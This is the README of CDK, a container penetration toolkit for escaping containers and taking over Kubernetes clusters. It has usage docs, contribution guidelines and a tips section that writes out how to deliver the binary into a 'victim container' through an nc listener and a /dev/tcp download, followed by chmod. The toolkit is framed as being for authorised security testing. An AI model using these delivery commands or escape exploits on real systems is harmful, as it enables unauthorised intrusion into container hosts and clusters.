Usage of CDK for attacking targets without prior mutual consent is illegal.
CDK is for security testing purposes only.
## Overview
CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.
## Installation/Delivery
Download latest release in https://github.com/cdk-team/CDK/releases/
Drop executable files into the target container and start testing.
### TIPS: Deliver CDK into target container in real-world penetration testing
If you have an exploit that can upload a file, then you can upload CDK binary directly.
If you have a RCE exploit, but the target container has no `curl` or `wget`, you can use the following method to deliver CDK:
1. First, host CDK binary on your host with public IP.
```
(on your host)
nc -lvp 999 <cdk
```
2. Inside the victim container execute
```
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk
```
## Usage
```
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk auto-escape <cmd>
cdk <tool> [<args>...]
Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.
Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki
Auto Escape:
cdk auto-escape <cmd> Escape container in different ways then let target execute <cmd>.
Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri><data> Make request to K8s api-server.
ucurl (get|post) <socket><uri><data> Make request to docker unix socket.
|Escaping|Read arbitrary file from host system (CAP_DAC_READ_SEARCH)|cap-dac-read-search|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-cap-dac-read-search)|
**Note about Thin:** The **thin release** is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.
### Tool Module
Running commands like in Linux, little different in input-args, see the usage link.
If you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the [Release Document](https://github.com/cdk-team/CDK/wiki/Release).
## Developer Docs
* [run test in container.](https://github.com/cdk-team/CDK/wiki/Run-Test)
## Contributing to CDK
First off, thanks for taking the time to contribute!
By reporting any issue, ideas or PRs, your GitHub ID will be listed here.
Bugs are tracked as [GitHub Issues](https://github.com/cdk-team/CDK/issues). Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.
#### Suggesting Enhancements
Enhancement suggestions are tracked as [GitHub Discussions](https://github.com/cdk-team/CDK/discussions). You can publish any thoughts here to discuss with developers directly.
#### Pull Requests
Fix problems or maintain CDK's quality:
* Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
* Running screenshots or logs before and after you fix the problem.
New feature or exploits:
* Explain why this enhancement would be useful to other users.
* Please enable a sustainable environment for us to review contributions.
* Screenshots about how this new feature works.
* If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an [example](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-deploy).
